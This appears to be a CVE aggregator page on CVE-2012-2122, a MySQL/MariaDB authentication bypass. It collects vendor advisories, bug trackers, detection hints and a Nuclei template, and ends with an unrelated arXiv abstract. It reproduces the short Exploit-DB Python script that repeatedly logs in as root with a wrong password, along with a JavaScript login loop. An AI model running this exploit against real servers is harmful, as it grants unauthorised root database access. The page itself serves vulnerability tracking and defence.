CVE-2012-2122
published 2012-06-26CVE-2012-2122: sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x…
PriorityP268medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
96.19%
99.9th percentile
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
| mariadb | mariadb | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandfor (let i = 1; i <= 1001; i++) { const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); }
- →The attack works by repeatedly authenticating with the same incorrect password in a loop (up to ~1000+ attempts); detection should look for a high volume of failed MySQL authentication attempts from a single source IP followed by a successful login. ↗
- →The vulnerability is in sql/password.c check_scramble() — monitor for successful MySQL logins immediately following a burst of authentication failures from the same client, especially on port 3306. ↗
- →The exploit loops up to 1001 authentication attempts with a known-wrong password ('wrong' or 'blah'); a Snort/Suricata rule counting MySQL handshake attempts exceeding a threshold from one source within a short window would detect this.
- →The glibc x86_64 SSE4 optimized memcmp() is the specific implementation that triggers the bug; affected systems are those running recent glibc on x86_64 where MySQL calls the system memcmp() rather than a gcc builtin. ↗
- →Use the Nuclei template matcher condition 'success == true' after iterating up to 1001 login attempts with a wrong password against MySQL port 3306 to confirm exploitability.
- ·The vulnerability only triggers on systems where the system memcmp() implementation can return values outside the -255..255 range; Red Hat Enterprise Linux 4, 5, and 6 MySQL packages are NOT affected because they use a gcc builtin for check_scramble() rather than the glibc SSE4 memcmp(). ↗
- ·The bug has existed in the MySQL code base since version 4.x but only manifests as exploitable when paired with a memcmp() implementation returning values outside the -255..255 range (e.g., glibc x86_64 SSE4 on Fedora/recent distros). ↗
- ·The Nuclei template requires the pre-condition isPortOpen(Host, Port) on port 3306 before attempting the brute-force authentication loop; max-request is set to 1 at the template level but the JS code loops up to 1001 times internally.
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat5.1MEDIUM
vendor_ubuntu5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-06-11·CVSS 5.1
CVE-2012-2122 [MEDIUM] MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
It was discovered that certain builds of MySQL incorrectly handled password
authentication on certain platforms. A remote attacker could use this issue
to authenticate with an arbitrary password and establish a connection.
(CVE-2012-2122)
MySQL has been updated to 5.5.24 in Ubuntu 12.04 LTS. Ubuntu 10.04 LTS,
Ubuntu 11.04 and Ubuntu 11.10 have been updated to MySQL 5.1.63. A patch to
fix the issue was backported to the version of MySQL in Ubuntu 8.04 LTS.
In addition to additional security fixes, the updated packages contain bug
fixes, new features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html
http://dev.mysql.
Red Hat
mysql: incorrect type cast in check_scramble() leading to authentication bypass
vendor_redhat·2012-06-09·CVSS 5.1
CVE-2012-2122 [MEDIUM] CWE-704 mysql: incorrect type cast in check_scramble() leading to authentication bypass
mysql: incorrect type cast in check_scramble() leading to authentication bypass
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
Statement: This issue does not affect MySQL as shipped with Red Hat Enterprise Linux 4, 5, or 6. For a technical explanation please see https://bugzilla.redhat.com/show_bug.cgi?id=814605#c19
Package: mysql (Red Hat Enterpr
GHSA
GHSA-4qx9-mwf7-7cx8: sql/password
ghsa_unreviewed·2022-05-17
CVE-2012-2122 [MEDIUM] CWE-287 GHSA-4qx9-mwf7-7cx8: sql/password
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
No detection rules found.
Exploit-DB
MySQL - Authentication Bypass
exploitdb·2012-06-12
CVE-2012-2122 MySQL - Authentication Bypass
MySQL - Authentication Bypass
---
#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
Nuclei
MySQL - Authentication Bypass
nuclei·CVSS 5.1
CVE-2012-2122 [MEDIUM] MySQL - Authentication Bypass
MySQL - Authentication Bypass
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
Template:
id: CVE-2012-2122
info:
name: MySQL - Authentication Bypass
author: pussycat0x
severity: medium
description: |
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12,
Bugzilla
mysql: Oracle CPU July 2012
bugzilla·2012-06-15·CVSS 5.1
[MEDIUM] mysql: Oracle CPU July 2012
mysql: Oracle CPU July 2012
This bug is for Oracle Critical Patch Update Advisory - July 2012 planned to be released on July 17 and that is expected to list several MySQL flaws:
http://www.oracle.com/technetwork/topics/security/alerts-086861.html
So far, MySQL versions 5.1.63, 5.5.23, 5.5.24, and 5.5.25:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-23.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html
http://dev.mysql.com/doc/refman/5.5/en/news-5-5-25.html
were released in the last CPU in April 2012:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
which covered fixes in version 5.1.62 and 5.5.22. Apr 2012 CPU is covered by bug #832477.
This bug attempts to list issues that were already mad
Bugzilla
CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass [fedora-all]
bugzilla·2012-06-11·CVSS 5.1
CVE-2012-2122 [MEDIUM] CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass [fedora-all]
CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.
Bugzilla
CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
bugzilla·2012-04-20·CVSS 5.1
CVE-2012-2122 [MEDIUM] CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
MariaDB upstream reported a flaw in MySQL server's check_scramble() function that is used to check user passwords during authentication. The memcmp() function return value of type int was cast to my_bool (char) type, which could result in 0 being returned by check_scramble() in cases when memcmp() returned non-0.
On systems where system memcmp() implementation can return values that do not fit into an int type, this flaw could allow (possibly remote) attackers able to connect to mysql port or socket to easily bypass password authentication.
MySQL upstream bug report:
http://bugs.mysql.com/bug.php?id=64884 (private)
MariaDB upstream patch and bug report:
https://bazaar.launchpad.net/~maria-capt
arXiv
AgentCyTE: Leveraging Agentic AI to Generate Cybersecurity Training & Experimentation Scenarios
arxiv_fulltext·2025-10-29
AgentCyTE: Leveraging Agentic AI to Generate Cybersecurity Training & Experimentation Scenarios
: Leveraging Agentic AI to Generate Cybersecurity Training & Experimentation Scenarios
Ana M. Rodriguez*,
Jaime Acosta*,
Anantaa Kotal*,
and Aritran Piplai*
Dept. of Computer Science, The University of Texas at El Paso, El Paso, TX, USA
[email protected], \jcacosta, apiplai, akotal\@utep.edu
*These authors contributed equally to the work.
## Abstract
Designing realistic and adaptive networked threat scenarios remains a core challenge in cybersecurity research and training, still requiring substantial manual effort. While large language models (LLMs) show promise for automated synthesis, unconstrained generation often yields configurations that fail validation or execution. We present , a framework integrating LLM-based reasoning with deterministic, schema-constrained netw
http://bugs.mysql.com/bug.php?id=64884http://kb.askmonty.org/en/mariadb-5162-release-notes/http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.htmlhttp://seclists.org/oss-sec/2012/q2/493http://secunia.com/advisories/49417http://secunia.com/advisories/53372http://security.gentoo.org/glsa/glsa-201308-06.xmlhttp://securitytracker.com/id?1027143http://www.exploit-db.com/exploits/19092http://www.securityfocus.com/bid/53911https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysqlhttp://bugs.mysql.com/bug.php?id=64884http://kb.askmonty.org/en/mariadb-5162-release-notes/http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.htmlhttp://seclists.org/oss-sec/2012/q2/493http://secunia.com/advisories/49417http://secunia.com/advisories/53372http://security.gentoo.org/glsa/glsa-201308-06.xmlhttp://securitytracker.com/id?1027143http://www.exploit-db.com/exploits/19092http://www.securityfocus.com/bid/53911https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
2012-06-26
Published